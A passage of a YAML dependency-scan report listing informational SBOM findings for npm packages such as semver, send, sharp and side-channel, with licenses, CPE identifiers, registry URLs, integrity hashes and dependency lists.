cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 186e8c930a60e0f6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: selderee 0.11.0' title: selderee 0.11.0 description: 'Package discovered: selderee 0.11.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a6fb1c756dcd04fc name: selderee version: 0.11.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:selderee:selderee:0.11.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/selderee@0.11.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/selderee/-/selderee-0.11.0.tgz integrity: sha512-5TF+l7p4+OsnP8BCCvSyZiSPc4x4//p5uPwK8TCnVPJYRmU2aYKMpOXvw8zM5a5JvuuCGN1jmsMwuU2W02ukfA== dependencies: parseley: ^0.12.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 809205930987a974 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: semver 7.7.4' title: semver 7.7.4 description: 'Package discovered: semver 7.7.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dc47801cc9b2ec78 name: semver version: 7.7.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:npmjs:semver:7.7.4:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/semver@7.7.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/semver/-/semver-7.7.4.tgz integrity: sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 67469cce48d87167 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: send 0.19.2' title: send 0.19.2 description: 'Package discovered: send 0.19.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1d81dd407a94f88a name: send version: 0.19.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:send_project:send:0.19.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/send@0.19.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/send/-/send-0.19.2.tgz integrity: sha512-VMbMxbDeehAxpOtWJXlcUS5E8iXh6QmN+BkRX1GARS3wRaXEEgzCcB10gTQazO42tpNIya8xIyNx8fll1OFPrg== dependencies: debug: 2.6.9 depd: 2.0.0 destroy: 1.2.0 encodeurl: ~2.0.0 escape-html: ~1.0.3 etag: ~1.8.1 fresh: ~0.5.2 http-errors: ~2.0.1 mime: 1.6.0 ms: 2.1.3 on-finished: ~2.4.1 range-parser: ~1.2.1 statuses: ~2.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3a3b9a5d9af10f0c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: serve-static 1.16.3' title: serve-static 1.16.3 description: 'Package discovered: serve-static 1.16.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0a7cfe5561f2b18b name: serve-static version: 1.16.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:serve-static:serve-static:1.16.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:serve-static:serve_static:1.16.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:serve_static:serve-static:1.16.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:serve_static:serve_static:1.16.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:serve:serve-static:1.16.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:serve:serve_static:1.16.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/serve-static@1.16.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/serve-static/-/serve-static-1.16.3.tgz integrity: sha512-x0RTqQel6g5SY7Lg6ZreMmsOzncHFU7nhnRWkKgWuMTu5NN0DR5oruckMqRvacAN9d5w6ARnRBXl9xhDCgfMeA== dependencies: encodeurl: ~2.0.0 escape-html: ~1.0.3 parseurl: ~1.3.3 send: ~0.19.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aaaf7e5ff977361c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: set-blocking 2.0.0' title: set-blocking 2.0.0 description: 'Package discovered: set-blocking 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: afe02a75a981b13d name: set-blocking version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:set-blocking:set-blocking:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:set-blocking:set_blocking:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:set_blocking:set-blocking:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:set_blocking:set_blocking:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:set:set-blocking:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:set:set_blocking:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/set-blocking@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz integrity: sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 506518f9c8ac4766 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: setprototypeof 1.2.0' title: setprototypeof 1.2.0 description: 'Package discovered: setprototypeof 1.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fc983ad918ad063a name: setprototypeof version: 1.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:setprototypeof:setprototypeof:1.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/setprototypeof@1.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz integrity: sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fdeea92c74bf39fa ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: sharp 0.34.5' title: sharp 0.34.5 description: 'Package discovered: sharp 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f96d5af8de184f83 name: sharp version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:sharp_project:sharp:0.34.5:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/sharp@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz integrity: sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg== dependencies: '@img/colour': ^1.0.0 detect-libc: ^2.1.2 semver: ^7.7.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a0d820679cbb3cb7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: shebang-command 2.0.0' title: shebang-command 2.0.0 description: 'Package discovered: shebang-command 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 14d8b5cbe6162ddd name: shebang-command version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:shebang-command:shebang-command:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang-command:shebang_command:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang_command:shebang-command:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang_command:shebang_command:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang:shebang-command:2.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang:shebang_command:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/shebang-command@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz integrity: sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA== dependencies: shebang-regex: ^3.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f5b7b8efb70e19a9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: shebang-regex 3.0.0' title: shebang-regex 3.0.0 description: 'Package discovered: shebang-regex 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b86e26fe1fc6c7c9 name: shebang-regex version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:shebang-regex:shebang-regex:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang-regex:shebang_regex:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang_regex:shebang-regex:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang_regex:shebang_regex:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang:shebang-regex:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:shebang:shebang_regex:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/shebang-regex@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz integrity: sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6b555e361c3642d5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: side-channel 1.1.0' title: side-channel 1.1.0 description: 'Package discovered: side-channel 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a236188908f1e843 name: side-channel version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:side-channel:side-channel:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel:side_channel:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side-channel:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side_channel:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side-channel:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side_channel:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/side-channel@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz integrity: sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw== dependencies: es-errors: ^1.3.0 object-inspect: ^1.13.3 side-channel-list: ^1.0.0 side-channel-map: ^1.0.1 side-channel-weakmap: ^1.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 890b23d99b8d3706 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: side-channel-list 1.0.1' title: side-channel-list 1.0.1 description: 'Package discovered: side-channel-list 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2e4a230ff21329f1 name: side-channel-list version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:side-channel-list:side-channel-list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel-list:side_channel_list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel_list:side-channel-list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel_list:side_channel_list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel:side-channel-list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel:side_channel_list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side-channel-list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side_channel_list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side-channel-list:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side_channel_list:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/side-channel-list@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz integrity: sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w== dependencies: es-errors: ^1.3.0 object-inspect: ^1.13.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6043652240bb3202 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: side-channel-map 1.0.1' title: side-channel-map 1.0.1 description: 'Package discovered: side-channel-map 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 36c9d18daa63eabd name: side-channel-map version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:side-channel-map:side-channel-map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel-map:side_channel_map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel_map:side-channel-map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel_map:side_channel_map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel:side-channel-map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel:side_channel_map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side-channel-map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side_channel_map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side-channel-map:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side_channel_map:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/side-channel-map@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz integrity: sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA== dependencies: call-bound: ^1.0.2 es-errors: ^1.3.0 get-intrinsic: ^1.2.5 object-inspect: ^1.13.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6c276e4fe79d17b1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: side-channel-weakmap 1.0.2' title: side-channel-weakmap 1.0.2 description: 'Package discovered: side-channel-weakmap 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3a35b0f8b53bc97a name: side-channel-weakmap version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:side-channel-weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel-weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel_weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel_weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side-channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side_channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side-channel-weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:side:side_channel_weakmap:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/side-channel-weakmap@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz integrity: sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A== dependencies: call-bound: ^1.0.2 es-errors: ^1.3.0 get-intrinsic: ^1.2.5 object-inspect: ^1.13.3 side-channel-map: ^1.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8acef3cde3b7b132 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: signal-exit 4.1.0' title: signal-exit 4.1.0 description: 'Package discovered: signal-exit 4.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a63ea3d2efb32143 name: signal-exit version: 4.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:signal-exit:signal-exit:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:signal-exit:signal_exit:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:signal_exit:signal-exit:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:signal_exit:signal_exit:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:signal:signal-exit:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:signal:signal_exit:4.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/signal-exit@4.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9476a789ac7d80fb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: simple-swizzle 0.2.4' title: simple-swizzle 0.2.4 description: 'Package discovered: simple-swizzle 0.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cef7b2b2b70b3db8 name: simple-swizzle version: 0.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:simple-swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:simple-swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:simple_swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:simple_swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:simple:simple-swizzle:0.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:simple:simple_swizzle:0.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/simple-swizzle@0.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/simple-swizzle/-/simple-swizzle-0.2.4.tgz integrity: sha512-nAu1WFPQSMNr2Zn9PGSZK9AGn4t/y97lEm+MXTtUDwfP0ksAIX4nO+6ruD9Jwut4C49SB1Ws+fbXsm/yScWOHw== dependencies: is-arrayish: ^0.3.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ff9098f7bbabdf5b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: socket.io 4.8.3' title: socket.io 4.8.3 description: 'Package discovered: socket.io 4.8.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5cc521e50bb4314d name: socket.io version: 4.8.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: 